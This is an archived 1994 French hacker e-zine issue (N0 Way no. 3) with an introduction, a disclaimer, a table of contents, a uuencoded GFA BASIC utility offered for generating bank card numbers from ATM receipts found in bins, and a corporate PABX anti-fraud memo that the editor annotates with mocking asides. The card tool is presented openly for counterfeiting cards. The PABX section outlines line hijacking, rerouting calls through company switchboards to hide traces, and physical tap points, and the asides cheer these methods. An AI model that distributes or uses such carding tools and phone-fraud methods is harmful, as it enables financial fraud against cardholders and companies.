home *** CD-ROM | disk | FTP | other *** search
Text File | 2003-06-11 | 215.1 KB | 4,728 lines |
-
- -%!% N0 Way %!%-
-
- Volume I, Numéro 3, Partie 3.1
-
- 26 Septembre 1994
-
- \-------------------/
- > N0 WAY III <
- /-------------------\
-
-
- Ce matin, j'écoute la radio: "Une famille algérienne va être expulsée. Le
- village où ils habitent se mobilise contre cet avis d'expulsion..." et le
- préfet raconte des conneries sur la situation déplorable que devait avoir cette
- famille en France sans travail stable et sans sécurité sociale.
-
- Mais bien sur, dans son mental de politique verreux, il ne pensera jamais à
- leur bonne intégration et aux problèmes qu'ils affronteront en Algérie.
- Il ne pensera pas non plus au FIS qui s'attaquera a eux.
-
- Je ferme la radio, dégouté ET LA, ca change: non, je ne me dis pas
- "Qu'est ce que je peux y faire, je suis isolé"
- Je ne me morfond pas en disant: "On peut rien faire contre ces pourris".
-
- Si, on peut faire quelque chose et N0 Way 3 est là pour se battre à sa manière
- contre toutes ces pourritures. Maintenant, BASTA...
-
- Les hackers&phone phreaks sont là !
- N0 Way est là !
-
- Alors dans cette issue sortie en quatrieme vitesse, j'espere que vous trouverez
- votre bonheur. Ca bouge un peu partout en france, on entre dans l'hiver et
- pourtant on sort de l'hibernation.
-
- A Toulouse des assos se sont montées pour faire bouger le monde de la
- rave, a Paris c'est une complete effervescence. Chaque jour, je voie avec
- plaisir un nouvel "apprenti sorcier" des réseaux me poser des question sur:
- "Comment on hacke?"
- "Comment on devient root sur Unix?"
- "Comment on seize un trunk au Japon?"
- Et les villes suivent: intiative techno & squatts à Lyon, bars & magasins
- technos et cyberpunk à Montpellier, raves underground à Lille, développeur de
- virus informatiques à Rouen, boite HardCore à Tours etc...
-
- Des initiatives jeunes se montent de plus en plus souvent dans notre
- société gérontocratique: Bars technos, Concerts grunge (à prendre au sens réel
- du mot), Teknivals (ou teknivaux? :), Bar Cyberpunk, accès Internet pas cher,
- home studio d'enfer...
-
- Aux USA il y a déja les Cypherpunks qui ont fait vraiment du boulot,
- l'EFF s'est battu comme un diable contre le Clipper Chip menaçant la vie privée
- de chacun. Matt Blaze a montré que le SkipJack (implémentation de ce que l'on
- appelle le Clipper Chip) était facilement "manoeuvrable".
-
- Résultat: le gouvernement retire le Clipper Chip.
-
- La même bataille reste à mener en France. En Europe, des choses très
- graves se passent sans qu'on en entende tellement parler. En france, les
- "pirates informatiques" sont montrés du doigt comme de petits vandales
- informatiques, Satanés gosses, tous les mêmes.
-
- Alors, lisez N0 Way, et RéAgIsSeZ !!!! Faites comme tous les cyberpunks
- de France: bougez vous et devenez actif dans le combat contre cet establishment
- qui nous étouffe.
-
- Dans ce numéro nous vous proposons un superbe article de notre ami Arscene sur
- la dissimulation de fichiers, un fichier répandu mais d'une qualité
- extraordinaire sur l'insécurité d'Unix par Dan Farmer et Wietse Venema,
- le manifeste génial de "The Mentor" traduit pour la première fois en
- Francais et plein d'autres superbes articles "mortels"...
- Vous pourrez vous "fendre la gueule(tm)" avec un article en particulier.
-
- Arrested Developpment, official distributor in Nederland (NL): +31 77 547 477
- The One propage -- N0 Way -- en France et en Europe: +33 49 88 76 91 (BBS)
- +33 48 70 10 29 (Minitel)
- +33 48 58 46 17 (Minitel)
-
- Vous pouvez me joindre:
- ~~~~~~~~~~~~~~~~~~~~~~
- Sur RTC 0NE ! |\
- Sur 3615 TALK | > Bal: NeurAlien
- Sur The 0ne ! |/
-
- Sur Internet !!!!
- Email: an133729@anon.penet.fi (signez vos messages avec votre Email).
-
- >>>>>>>>>>>>>>> TOUT ARTICLE ACCEPTE *<<<<<<<<<<<<<<<
-
- "This is the network of the life" --Corona.
-
- ++NeurAlien.
-
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
- Disclaimer:
- Cette publication électronique peut contenir des informations,
- données et articles interdits dans certains pays. Si les
- informations de cette publication sont interdites dans un pays,
- il est du devoir du lecteur de vérifier qu'il a bien le droit de
- posséder et de lire (ahahahaha :-) cette publication. Les auteurs
- et éditeurs ne sont en aucun cas responsables d'une mauvaise
- utilisation des informations publiées. Pour les attaques en
- diffamation et autres conneries bonne pour les censeurs, allez
- voir qui vous croyez être l'éditeur.... Pour la simple et bonne
- raison que de responsable de la publication et d'éditeur il n'y
- en a pas!!! Les informations fournies dans cette publication sont
- à titre informatifs uniquement. Nous ne vous garantissons rien et
- si ca vous plait pas allez lire autre chose! Hahahahahahahahahaha...
- Toutefois, la diffusion et la lecture de ce bulletin PRIVE est
- restreinte à toutes les personnes dans l'underground informatique.
- Ne font pas partie de l'underground informatique tel que je le concoit
- les personnes suivantes: Membres d'équipes de sécurité publiques ou
- privés, personnes affiliées à des agences gouvernementales,
- informateurs quelconques, responsables sécurités et autres empaffés se
- croyant supérieur de par leur titre.
- Lire ce bulletin en n'étant pas dans l'underground informatique
- constitue donc une violation des lois de Copyright et de Propriété
- Intellectuelle ainsi qu'un acte de malveillance envers les auteurs et
- les rédacteurs car cela revient à lire des informations propriétaires.
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
- Après ça, c'est pas la DST qui peut nous faire un procès pour
- N0 WAY...
- "Quoi? Vous avez lu de la documentation propriétaire et secrète alors que vous
- faites partie d'une agence de sécurité????"
-
- -%!% N0 Way %!%-
-
- Volume I, Numéro 3, Partie 3.2
-
- Table des matières:
- ~~~~~~~~~~~~~~~~~~
- # Titre Auteur Taille
- 3.1 : Introduction N0 Way Team 6 Ko
- 3.2 : Table des matières N0 Way Team 2 Ko
- 3.3 : Trash & Carte Bleues Field 9 Ko
- 3.4 : Piratage des PABX -- Premier Acte. *Operator TDF* 17 Ko
- 3.5 : La conscience d'un Hacker The Mentor 4 Ko
- 3.6 : Data dissimulation techniques Arscene 20 Ko
- 3.7 : Playing hide 'n' seek in CyberSpace NeurAlien 21 Ko
- 3.8 : Cartes Téléphoniques -- Premier Acte. D. O'Connell 9 Ko
- 3.9 : L'Underground Francais sous developpe? * NeurAlien 16 Ko
- 3.10: L'art du Social Engineering NeurAlien 7 Ko
- 3.11: "Breaking Into Your Site" D. Farmer & W. Venema 53 Ko
- 3.12: Plaisanter sous Unix NeurAlien 10 Ko
- 3.13: Du coté d'Internet NeurAlien 19 Ko
- 3.14: L'explosif? Tient tient... Inlandsis 7 Ko
- 3.15: Prime & The PrimeOS environment * NeurAlien 6 Ko
- 3.16: Rave Revolt NeurAlien 4 Ko
- 3.17: Multics * NeurAlien 7 Ko
- 3.18: Tel - Trixx NeurAlien 6 Ko
-
- Nota: une étoile (*) après le nom de l'article veut dire que cet article a été
- fait pour CORE DUMP et ressort pour N0 WAY.
-
- -%!% N0 Way %!%-
-
- Volume I, Numéro 3, Partie 3.3
-
-
- >--------------<
- > TrAsH &&& C.B. <
- >--------------<
-
- Le fichier suivant est à uudecoder. Si vous savez pas faire c'est vraiment que
- vous avez autre chose à apprendre que la contrefacon de numéro de cartes
- bancaires.
-
- Ce petit utilitaire a été écrit pour ST (GFA basic) par FIELD.
- Il permet de générer des numéros de carte bleue à partir des bouts de papier
- trouvés dans les poubelles des distributeurs automatiques.
-
- Vous pouvez contacter Field sur The 0ne. +33 1 48 70 10 29
-
- alors, revetez votre cyber-combinaison, prenez votre portable et votre radio-
- modem 28800 bauds puis rendez vous à l'ATM le plus proche pour une autre
- session de délire avec N0 Way...
-
- ++NeurAlien.
-
- ----------------------------------CUT HERE-----------------------------------
- section 1 of uuencode 3.07 of file cb_nums.zip by R.E.M.
-
- begin 644 cb_nums.zip
- M4$L#!!0``@`(`&1F)QWUW^]R`04``(X+```+````0T)?3E5-4RY'1D&M5LUO;
- M&T44GQW;&W^LG<3Y:H*3C*VH::,VV$DV:1!2V8UWBHMC1W9:A%0)F62K&KEV'
- M\4=4]51%XMX#!X[\$1QZ[*DJ$D*<N.',2@@AU`-';N7-?MG+6B8'DOSFO?ST(
- MWF_>FYW9612X0Y6;JE(M'&PCZZ>/D'`5L'D)M/V(O$0H^CO@3X1BKQ&2DH#Y(
- M2T#U(_&$0RS=.]0JY<!1N2I6CRL%K20H@BH<"'E!PTH.*UM8V<;*#E9DK.QB"
- M90\KM["R'U!R64`.L`78!NP`9,!N\*A2SH?XD#/'[9`YA^G+YKAGCONB&9.S5
- MS+9EY``$!T$I&P0'YL]B-8?5+:QN8W4'JS)6=[&ZA]5;6-T/J%"%"E6H4(4*0
- M5:A0A0H::FXW0"L:LKN#1@1EJ!7%[.82K8A:Z:`\T$&A0NGHWO'$?:U2H`4M7
- M6M(^_=Q>/T@P"PYII7R!1K1J52EL9K/94%Y3(8,6#CXN:!4A)VRA,/H;A2DRE
- M[81IKYA6#+ZE%.V&7O5OY%O-IOZ,-'1RTCK5"?PU:N2+6O.KGDZND1UR\JC^S
- M\&%;[Y#KY(.T@2G:@"PRR&KV'I^W6SQO?Q`+D2)%5W&QGZKH)X_T-H#4SO03`
- MR.@,PC(\:A,?';Z!_;J1_N]@BD1<A#$QR$'4["Y"#Y&(4G:/O&<"OX$[9/7G'
- MX_[T@P.E<JQ5;;-9RA&*UH)K?:&<=G3\,:`11;=`XR?Z!DFXJ/+("<@L05]W(
- ME&Y7;W;KK299=S/6B?ZTWNG6ZEUR>OYEC=P@]08YJQ&]V]9)6V^V'I\3?2AA,
- M:WV3HE3H>3]R4FMW]<YF,]<8^%MVC:UQ-7:AZS7W";>'UH"O2%C((NDE-6W<_
- MM@M@DV`W?D7?F2^*(*8ZNB+L(.&V@=,_\+F$M#E"KYP/N#SV\$&7#WCXD,L'#
- M75Z"&<.R`:[E1V0CX/A1V0@Z?DPV0MSG.N';ACBJGHC+>^N)NKRWGIC+!SV\[
- MY/(A#Q]W>='#)UQ^PL-/NGS8PT^Y?,2S#@G9"#O]3LI&Q/&G9"/J^-.R$7/\B
- MI&Q(CC\C&W''GY6-A.//R<:DX\_+QA3W^9X0^)EQ]P3_C^\!!'M@%NPB"T]<0
- M/+=V`1PD-,_/S-T\6YR\</;&72=R,73QPMDOV-YU4UR+(9$MBBQ"K<@E%AVA*
- M^2U;\FDNL:5QFDLBB]F:*2:-T'S+4C[-%$N-TTR)+&YK+K.$7_.3C]BR3W.92
- M+8_37!;9I*VYPJ9&:'[#5GR:*VQEG.:*R*9MS566'*'Y!UOU::ZRU7&:JR*;@
- ML34)F_5K%C]DQ*=)&!FG240V9VNFV?P(S1<L[=-,L_0XS;3(%FS-#$-A-QLB@
- M.;?&4&R82YCS_,;6)):Q]CRFQ]:;^_`7VD1/<?$S?OI6S#,8)9D]%@9$`%%`]
- M+-,7."<!XH`$8-+FI@#3@"1@QN9F`7.`><!"IC]'1OUD^$D<NC$>#.XK3/[7:
- M"IR.=7L5!V<=TR?F>BVP!=%^+H%W])WU7$H_LH69P3.8<6\&GA%G\1$9KUE\D
- M*./4O5-XAL0D3X;Y3$JOF#3#-IP[>Q=NS?GB>JM]6F_6NGJO3;XFW7:K=W;.V
- MFT*9_K3]+=&!*[-1/X4K\%^KR#N-FO>\U>E@]+[IIBFU[)7A.%KY:KMYOB
- M]1KZLYMGK5Z'])KPD=&S+F;GH^-:^?W2=9(VDM3JN:P:R??@(T$P38O:MZQAO
- M[:YRA2:1*/PU5`N?/8B^_P=02P,$%`````@`X'OU'!=FX(YY`@``\P8```L`(
- M``!214%$7TU%+D=30U/`#FX=(0CV\W)A5Z>P62%:V]@X5E?#4%/7Q-+"0M?<2
- MS-)0(2"Q*+-8WZTH,2\Y%:@$AX&;%4Z>I0[8K;`98N`NA5MP?]VY<^?^_?M`M
- M4@&/$!9%"@K[@>;`#82!V_?!)$CI_=MP(3U4(9`B/51%$``U$`F`I/44[MR_?
- M#01WP#P(@2($Q+^01'BY[@-MN`V"0./OW84:=/OVIMNW[X*X0/P+50BB"$@BA
- M%$$-!ID!=--M!8B!</M!FL"*(5+H0O<A0`%-$1AC&/>+H'%P0,@XN&^!&*04$
- MZ!60T`]4(84[4/?=AXN09!QV&X`8IW'W;X-C'=EGMS$]"Q4"I30P0"BZ#XG,U
- M^U@BXP=A`Y%"#ZX(;@*2@7=0DLMM1$KXB6K@O=N0P$-6=.<V#&-)PC^!?@(IW
- MO8^1@A"._JF`4(21K<`Y#V2KPIW;"$-O*R"Y`*SH)[(B&$#*IP?@@I`,#4ZC:
- MD*`!!SB4ANE'4P0!-Q$&GJ!2T;0'8N`!U/)OLX);9DJ^7VJ)E9&5D8F!OI&AF
- MD:&>D:%"<$%B439(N-C`($\A.3\W,R]=83-:X7D3+1I`X,`1$@#(@`!G?8\`%
- M$PM]QQ)@6:WOD9B<K9ZG4)!1E)J8#;13WR4_N5@_(!-(!.>7YJ7\"DY-+LDOL
- M4C#(2]5W+2S-S,NOT'?U-M!W*RTJR2Q+U8>X*"C86=\OM5PA.+&DM"A/(=PCF
- M\)=S?EY)47Z.0DAJ8JZ^8U%V1F*N@AM0/""C"&@E4#^0\,M7"$^L5$C)+"Y1\
- M*,XL2?V%\)^BP@<_@P\*08XAG@80IHNCIT^D@H^GKV<(1"`@R#/,T3D2PG%T?
- M"@WV#'-5<'/T=E50Y.4"`%!+`P04````"`"2H@(=BOTJL54"``#Y!0``#```C
- M`%)%041?1$E3+E546%,`@0T;-^$"&S<`Y>^`52GHX5?(RP4S[/9],+BM`)9!J
- M\("&Z8'5_$15B`K`"I$,4[A]7V'#!IAA<![894"3_H$<AJ00%6`:IK`!V3`%7
- MF!JHRQ`*,<W"-.P^BF'W$88IH'@3[C&(*5`NNF$P*R"&(2P$^>\^./B18PI54
- M/7H$*&P$`5B(0GC(+D.+S=MP%;@-0P5($0"*`07B#<.2=K!%`$(*B4(S[#Y6@
- M`/?F?4@,(`Q#J,!B&.Z$#8U(HG.`PBV%(Q0"A?U0LS8#<>@OA?>_%%Q^*3SY.
- MI1#T2\$=3!K\0H@#00A85N,7B&$`%E\+Y@:#9#?#'':`<H?=A)D%LC3CB4+>E
- MDW*%D"]/\EP4\N<KK/4[].3+^V4AF09YCCD*X8E![Z(4D@U*@[ZL?1>TUB]='
- MP>"+^[+W:X.7A:PUR-,#&C0W/U0]1<%GK7>JPB$#A:0G"LO>*X2&P+4HK%`P6
- M*`(I*E)XF._XQ44AU[%2X>$[D)*4M<4A7]8FA1[RS'^O4+RVY(G""K##(.H5$
- MLD*+0Q3*'?-"%(H-<I\HY+LI`(U4F+\V[PE0M.A)%=!DGW<A"I4&I0H:RWQRC
- M%`SRX(H\`A7R@Q2L8-X,?>_R),@]R!](*X0\T0@Q>+_6.5C!,??)E[7)CGD*[
- MX4#E5@I!3QX^\5'P>;(V.#3HB8*VH;Z%@:&N8["WKLG:$$7\)CTI#<H/>`<W1
- M*<3CB8+!^R<*#Q\&`[5H&QOK&YI86N@&/0DF9)!C\=IE?B!IB$$N&D#O_'X2F
- MY./OZ`(TR,+42-_(W%`WV"#<PS'$GI<+`%!+`P04````"`#H92<=:TQK`&8'R
- M```J$0``"P```$-"7TY535,N1$]#K5C?;]M&$GXWX/]AWF3'%FDGOL0QF@"VF
- M$C<IDM9-?%?@C@=A1:WLO?"'LB3=7$S=@P"_]*^^;V:X$M4F=0N43B*2N_/-`
- MS#??S%KQ=G9"YZ]?OGFQO45\S7UYY4V>6YI;G]NZ-D5-4TO>UKYL;JS'0T5%Y
- MDR]]6?%":GQMJ;.>F"(USENZH[GQKM;=3RF]=K.9QVUE27`8M6H\97A'P;IV.
- MZ0=;*ZKUM7$%[EU5>S=I:MMX69FX+,.F:'MK>VMD4T>V0H!ED5)F\)DVN2UJV
- M4[NRH&G32^=CXU;>K?B<&N!G`^,1'5X)"X?1/U]?1'3F;`$+CJ,'86A9+\&$'
- M&<(Z<]62L.O;\]/AF:E<2O]ASHK*BB$G5LV7J3/86-M*B+@829ZP+@:F\25(-
- M,$W:%.QCDOV2,V\9QVBF#;,(^(O3]Z/3-\CV[]AE&YH.7#$K?2X95BL.OT;3>
- MR?86X!%_,:6BS"<`Q>*+TS/:Z9L@C+ID3`Y];;V+PMR4386<(04"DI9(7[IBR
- MBOU<23!?E4JRU35S8UP-:[^LG5\2E])UO'3B83?O7I]1V5!:YO/:1C3JK[$HK
- M>)W+RQM*T`T_\ZR!LFJN;6WSN>3:TQ=B<YE2G)8>;^8E,K]#Z)8563O+EFLOM
- MHS-J:B>UG)?"95<@UCM2B'!K/\%19D\(*6R$/]+HCIX^.:*#PX>/Z.AOCY_0.
- M\=/#`\C#?H$KZPWG=$(/'_%6[)2-G&8O6A&S:3XA+W.C[><+9U'759IP#BXXL
- M2>F^T':0R7<#X\!Z;OS'9@GY0I%3QE`Q=TW%]9>2UE;@*XZ512WMAXJ`PV+PI
- M7PA>Y:DI`YW[`I+KBBS_3&T.<=G/7"1N/0IS(E58@00-0)]P5P&Z:F8S)U-EP
- M)L."!3RWM>,V014F-N,WO88=LO6-Q"H]:S4%J1@@T9VFJN`2XJB<=H#[C$RM7
- MCHEW%K9,PAWE9=%K:,2B4VYSPK%8I&MU3-C^N$/-;]#2S%F*_E7<;&/(L9!K,
- M,=8Q@5L1,%>JT2Z>^U\J.CX(P!&]SI1-H08JF6*=K4OM9EF#O\*F-0+DKG\[B
- M^N$MEPJ(:%[/1#6I4J*4,6,BZ$D9*L@MD#N6CH0%<MZB<^MFOIR95$;F$@(1A
- M-@(7:TH#"2'],$%7;`'N37]<]N5!==D`=V`FI9]N=A'$R^($'%=<IKFEH[76:
- M=Z2_NNZ$>U>9BLZ^O\!P`FL5]U167H7)-662_!<],+RVV5!*P\WF6>(BIDD8V
- M^5-1HZ\8B`>93>45"H_PF6D]L124MS:B3--4F`^"`B5!UEZZ%,?+U4JXJ8Q>S
- MH=U5?%[HK*RDI=@W7H'-JN%5B!H?&,N3I12<>>YKBM,IK*@03F6^`:O)2R=%V
- MV9Q36C2QWD%9W<PIZ*/'AT<BI5WIE._6_AD-*+TSK)LZH<#=&<O#"HE+AW9#T
- M(<,TT,YFXDR^S%SINP/K;O-(92]=7*LS$*:8!,.,!?4/AIRS%#]W#.>:LEDUG
- MPKO+T?"'[U]VOT,0Y:Z`?49'Q\,G!\/#@^'#I\138F*R\)O.]M8EY&BE($SC>
- MG1SL4RA_[I?I$IKEDA52/EGZV`SN,,RXS3A4GN8I$IHQKH[(U%1=]5BI.#HP;
- M\SP/%9[IE9ED[(E/X>TMG/$#/70Z"JW,ROZY+L6@KUW#9T-Z@1+-7"8,5G9*5
- M];5O>($-]XCB7YE$]+M7O-X4L>.XE1</?N.Y'/;0!OA1\W8\'D?1N$/:`T0<?
- MXQ5>C&4EXEO:ER>YY5W\3SMH!^L`<"6=[V`LS@90;;<<]T*.@UD27H['+2ZV3
- MVEV%F224C,=Q,):]+2),QNL(^1.>$UKP,S8LU#P.(`OQU"8!L7\M:!RWH5RWX
- M8AL+7,Q_NOLUSP(2WW:/"K5(-.68@XHYV`YPC\!&JYRTBH?`^95P+RA)*S=)^
- M>%3@!=]%RO.NIAP%L@`GCD)&XUW>V:ZH3/1OLGJ\[2J4:)WE/@XIQQTC0IQ$K
- MJ-ERT'M*9;R)R!:W?0J3/IYDW++A0IG9462%C=>W29>EL-HQR>%A^T+A]L+F?
- M7?T(BDG&.VNTE:@6BIUH#(N.WUB(7P7'*.,.[#9DC?L!*$Q6R8B9PB?CF%9NF
- M-0:`19UWYFM'_F@B(M6D72E5-L:B`7E\UE69QKH6`HLT-+9J^2G1#A[2\`'^&
- MALIIZ61CI!"J@R1P\6`]=D)OM2$I#;D-XN=.ZV_\53WC(&`=$FP\Z&^):#U'N
- M,`6HOPZCL[/WNIS$7YB$>QM/@TW8:.W@-Q>FV[._]MK>>H]?RDI/!X6-7WXH1
- MX_/SR_@E3I6B_!2?-_C*<6/C4__AVN3TTZL?:?B_(7WS7#Y&.,=\F=&EQ=JY6
- MMT5Z3:]^O"_"Y_3J`H<;_53Z;$KXZFGIFWLBY`.#Z")^%9_&HWW8'QWOT[G)W
- M<)#NT_O+?3K-W979Y^^G/QMO/^_3M2OJ:I]&UX8_^-S*2WR_(-(SYGY:GM,[&
- M5USA.^?/=')/?*L(_X6Z/L+/OR'8'3I$TQ[AU^HA'>/G"3X?X^E03K]#^K:DH
- M@_B-/%S@?QHJJ/`<WW)QH/_1"/_4M;WU?U!+`0(7!10``@`(`&1F)QWUW^]R3
- M`04``(X+```+``````````$```````````!#0E].54U3+D=&05!+`0(:!10`*
- M```(`.![]1P79N".>0(``/,&```+````````````(````"H%``!214%$7TU%=
- M+D=30U!+`0(:!10````(`)*B`AV*_2JQ50(``/D%```,````````````(```'
- M`,P'``!214%$7T1)4RY55%A02P$"&@44````"`#H92<=:TQK`&8'```J$0``\
- M"P```````````"````!+"@``0T)?3E5-4RY$3T-02P4&``````0`!`#E````D
- MVA$``+,!1&EZ('=A<F4@=V%S(&QE96-H960@9G)O;2XN+@T*R<W-("#;V]O;)
- MLB#;V]O;LB#;V]O;LB#-S;O)S<W-(%LK,S-=+2@Q*2TT.3@X+3<V.3$@<V]OT
- M;B!A;B!54U(@5C,T(&YO9&4N+BX@S<W-NPT*NB`@("#;LB#;LB#;LB#;LB#;N
- MLB`@("`@(+JZ(%-E8W1O<B!/;F4O17%U:6YO>"]%2T\O1G5R=&EV92]&1E0O<
- M07)K:&%M+TI&1B!72%$@N@T*NE1H92#;LB#;LB#;LB#;LB#;V]NR($)"4[JZ/
- M("%&=6-K(2]#;VYT<F]L(%1E86T@1DA1("T@4&AR86-K+TYO(%=A>2!D:7-T9
- M('-I=&4@N@T*NB`@("#;LB#;LB#;LB#;LB#;LB`@("`@(+JZ(%!#+T%T87)II
- M+TA0-#@O4$A!0R]-:7-C96QL86YY("T@2G5S="!K97=L('=A<F5Z("$@N@T*=
- MR,W-("#;V]O;LB#;LB#;LB#;V]O;LB#-S;S(S<W-($ME=VP@<F%T:6]S+"!NZ
- D;VYE(&9O<B!L;VYG+61I<W1A;F-E(&-A;&QE<G,@S<W-O`T*6
- ``
- end
- sum -r/size 57111/7388 section (from "begin" to "end")
- sum -r/size 39491/5256 entire input file
- ----------------------------------CUT HERE-----------------------------------
-
- -%!% N0 Way %!%-
-
- Volume I, Numéro 3, Partie 3.4
-
-
- ,{$' Piratage '$},
- . __=/%(~{; ;}~)%\=__ .
- ~\|[:&^ des ^&:]|/~
- `\![! !]!/'
- `+# P.A.B.X #+'
-
- PART I
-
- Avant propos: Apparemment, en France aussi les grandes entreprise se
- mettent à réagir contre le piratage des PABX. Ce document provient d'une
- grosse entreprise francaise et concerne le piratage des PABX.
- Interressant de voir comment le monde des hackers est aidé par les entreprises.
- J'ai trouvé ce document dans les poubelles du secretariat de l'entreprise qui
- produit ce document! arf'''
- ps: ce qui est entre crochet vient de moi. ++NeurAlien.
-
- --------
-
- Le piratage classique des systemes telephoniques PABX
-
- Societe Operator TDF
-
- [ya pas de copyright, on est inattaquable hehehe]
-
- Le Piratage telephonique.
-
- Sommaire:
- 1°) Approche chronologique en terme de piratage de ligne:
- A) Premier controle de facture
- B) Controle de la facture suivante [Kewl, ca nous laisse 4 mois tranquile]
- C) Prise de conscience [ptin ils sont lents ;) ]
- 2°) Approche chronologique en terme de perte de contrat
- A) Baisse du chiffre d'affaires
- B) Augmentation du CA du concurrent
- C) Prise de conscience [bin oui, t't'es fait niquer! ;) ]
- 3°) Les types de piratage:
- A) Ecoute des communications
- B) Detournement d'une ligne
- C) Recherche des lignes modem
- D) Sabotage des systèmes [Beurk!!!!]
- 4°) Les méthodes de piratage:
- A) Piratage d'une ligne.
- B) Piratage d'un base TSF. [Telephone Sans Fil je crois]
- C) Piratage des fonctionnalités d'un PABX.
- D) Piratage des auxiliaires d'un PABX [Messagerie vocale par ex.]
- 5°) Les moyens à mettre en oeuvre:
- A) L'acces des locaux
- B) Protection des informations
- C) Destruction des informations périmées
- D) Sauvegarde de l'information
- 6°) Les moyens de controle:
- A) la taxation téléphonique
- B) L'observation de trafic.
- [==Deuxieme partie dans le prochain numéro==]
- C) Le controle qualité des lignes.
- 7°) La protection des lignes des systèmes [a partir d'ici, c'est sur le mec ]
- A) Piratage du mot de passe [ qui a écrit ca avait fumé ou ]
- B) Mot ou clef aléatoire [ gobbé un acide ]
- C) Cryptage des lignes
- D) Cryptage du disque dur
- E) réorientation des appels
- 8°) Les supports de transmission.
- A) Les supports radio.
- B) Les supports physiques.
- C) Les cabines de brassage.
- D) la gestion des supports.
- 9°) Les couts du piratage:
- A) cout des fonctionalités
- B) cout de la telemaintenance
- C) Piratage volontaire du PABX
- D) Piratage de l'informatique
- 10°) Les méthodes:
- A) Introduction
- B) La méthode MARION
- C) La méthode MELISA
- 11°) La loi godfrain: [ Rahhhh.. chiotte galactique !]
- A) Intro
- B) destruction
- C) les niveaux de cette loi.
-
- Document
-
- 1°) A)
- taux normal: augmentation de la facture : 4% tous les deux mois.
- Element moteur: elevation anormale de la facturation
- controle par rapport aux factures precedentes.
- detection: taux d'augmentation constant, passant brutalement d'une
- facture sur l'autre de 4% à 9%
- constat: augm.o brutale de 5% en plus des 4% habituels.
- pourquoi?
- - pas de changement de contrat, pas de creation de nouveau service.
- Action: demande de controle et facturation detaillee pour les mois a
- venir.
- B) facture suivante:
- meme chose : augmentation 9%
- analyse: verif de la fact. detaillee.
- constat: - appels minitel
- - appels vers l'étranger
- - appels en dehors des heures ouvrables
- question: interne ou externe?
- reponse: les deux
- conclusion: le système est piraté.
-
- Cette conclusion doit rester interne et confidentielle.
-
- action: eliminer les causes interne en premier
- action sys: controle d'acces
- >>> EVITER DE FAIRE CONTROLER SON SYSTEME PAR SON INSTALLATEUR OU
- CONSTRUCTEUR DANS UN PREMIER TEMPS.
- C) prise de conscience
- a) demande d'info:
- - autres entreprise
- - presse spécialisée
- b) declenchement d'une mission interne preliminaire:
- 1) constitution d'un groupe de travail.
- 2) definir les objectifs
- 3) definir un planning
- 4) rechercher un cabinet independant disposant d'experts en la
- matiere.
- 5) presentation du probleme.
- 6) Etablir un contrat definissant la mission du cabinet.
- 7) signature du contrat.
- c) declenchement d'un audit.
- 1) def.o de la mission
- 2) planif.o " "
- 3) analyse physique de l'existant
- 4) analyse des risques financiers
- 5) analyse du système
- 6) definition des controles à mettre en oeuvre
- 7) definition des tests à réaliser
- 8) mise en oeuvre de 6 et 7 [ OUARF... TROP UTILE LA 8) !!! ;) ]
- 9) [yen a pas!!!! bin alors ?? ;) ]
- 10) Consignation des résultats
- 11) les recommandations à mettre en oeuvre
- 12) Synthèse économique et technique sur les risques et les moyens
- complémentaires de protection à mettre en oeuvre.
- d) action:
- mise en place des solution d'urgence préconisées.
-
- 2°) [ c'est chiant je passe]
- résumé: voir si ya pas un employé qu'est parti à la concurrence.
-
- 3°) les types de pirate:
- A) detournement d'une ligne pour téléphoner [ ouais !!!!! Beige Box rules ]
- B) detournement d'une ligne pour appeler des serveurs Nitel [ kewl ! ]
- C) ecoute des communications [ c'est vous qui le dite ;) ]
- D) Le pirate informatique, vol d'information [ bande de paranos, on
- en a rien a foutre de votre bilan commercial cumulé sur l'effectif
- différé rétroactif.... tout ce qu'on veut c'est VOTRE SYSTEME !! ;) ]
- E) Le sabotage des systèmes [ ya que les burnes qui font ca ! ]
- F) Le pirate sportif [ ouais !!!!! ca c'est kewl ! ]
-
- A) detournement d'une ligne pour téléphoner [ ouais !!!!! Beige Box rules ]
- Objectif: telephoner gratuitement à cout moindre
- [ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ]
- [ mais il était raide bourré le mec qui a ]
- [ écrit cela !!!! hahaha... je suis pete de rire ]
- Ce detournement peut etre volontaire: [ plutot oui! ]
- - programmation volontaire sur un poste ou dans le pabx.
- - appel d'un auxiliaire du PABX, messagerie vocale par exemple,
- pour ressortir vers l'exterieur.
- Pour un appel vers l'etranger, le pirate sera taxé de son
- domicile au PABX piraté. Ce dernier sera taxé pour la ligne
- établie jusqu'à l'étranger.
- ou involontaire: [ on y croit ! ]
- mauvaise affectation des taxes sur les postes.
- - lors de l'utilisation de la fonction conference
- - transfert
- - renvoi
-
- B) Detournement pour appeler des serveurs minitel:
- le detournement dans ce cas est generalement volontaire [ ouahahahaha ]
- La méthode consiste à appeler le PABX d'une société:
- - obtenir une ligne sur le PABX
- - surnuméroter cette ligne
- - ressortir vers l'exterieur.
- - obtenir la liaison avec un serveur.
-
- C) Ecoute teleph
- [ c'est chiant, je tape pas ces conneries ! ]
-
- D) Le pirate informatique, vol d'information
-
- PIRATE ===> PABX société A
- ||
- ||
- \/
- Central FT ville 1 =====> Central FT Ville 2
- ||
- ||
- \/
- Site informatique piraté.
-
- [ comme ca la trace est remontée plus difficilement ]
-
- E) Le sabotage des systèmes
- [ PFFFF..... ]
-
- F) Le pirate sportif [ La le mec sait ce qu'il dit ! ]
- Objectif du pirate: l'argent n'est pas la motivation principale,
- du moins au départ.
- buts: * se connecter à un max de système
- * penetrer par jeu
- * s'introduire au coeur meme du système par défi
- methode utiliséee:
- * recherche des numéros d'appel
- * recherche de mot de passe
- * contourner les protections
- * acceder aux fonctions interdites
-
- Son but n'est pas de casser. Il peut seulement souhaiter utiliser des
- heures machines ou des données.
- Peu dangereux, il peut le devenir si: [ jamais vu cela ! ]
- - il donne ses infos à des tiers sans scrupules
- - des société concurrentes
- - il est recruté pour l'argent
-
- 4°)
- A) Piratage physique des lignes analogiques
-
- FT Central FT
- ||
- -------------------- ||
- \/
- Société PABX
- ||
- \/
- -------------------- repartiteur dans la cabine PABX. *
- ||
- Immeuble de la société ||
- \/
- repartiteur général * $
- ||
- ||
- \/
- sous repartit d'étage * $
- ||
- ||
- \/
- poste tel . * $
-
- [ une * == point de piratage physique possible en analogique ]
- [ un $ == point de piratage physique possible en numérique ]
